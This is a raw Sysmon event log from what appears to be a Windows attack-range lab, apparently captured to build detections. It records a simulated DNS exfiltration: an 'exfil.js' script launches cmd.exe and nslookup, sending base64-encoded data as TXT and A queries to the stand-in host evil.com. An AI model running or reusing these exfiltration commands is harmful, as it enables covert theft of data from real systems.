14:16:04.998{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.998{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.998{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A23D-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.998{2E1864BB-17A4-629A-A03D-000000005F02}47848064C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-A23D-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.012{2E1864BB-17A5-629A-A23D-000000005F02}1692C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-A03D-000000005F02}4784C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvghi.tmp 2>&1 23542300x800000000000000043908Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:06.432{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0E9CACEDD903F32B170C188851F68E,SHA256=F35A5444C400CE1B2783AF45A72BE56D9E716DC66E6DB39735698F3368A240E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-17A6-629A-CE3D-000000005F02}76167880C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-CF3D-000000005F02}4796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CF3D-000000005F02}4796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.982{2E1864BB-17A6-629A-CD3D-000000005F02}79364288C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-CF3D-000000005F02}4796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.990{2E1864BB-17A6-629A-CF3D-000000005F02}4796C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-CD3D-000000005F02}7936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmgr.tmp 2>&1 10341000x8000000000000000194436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.966{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-CE3D-000000005F02}7616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.966{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-CE3D-000000005F02}7616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.951{2E1864BB-17A6-629A-CE3D-000000005F02}76167880C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-CD3D-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CE3D-000000005F02}7616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CD3D-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-17A1-629A-783D-000000005F02}55525824C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-CD3D-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.935{2E1864BB-17A6-629A-CD3D-000000005F02}7936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmgr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.920{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlygq.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.904{2E1864BB-17A6-629A-CB3D-000000005F02}5916216C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-CC3D-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 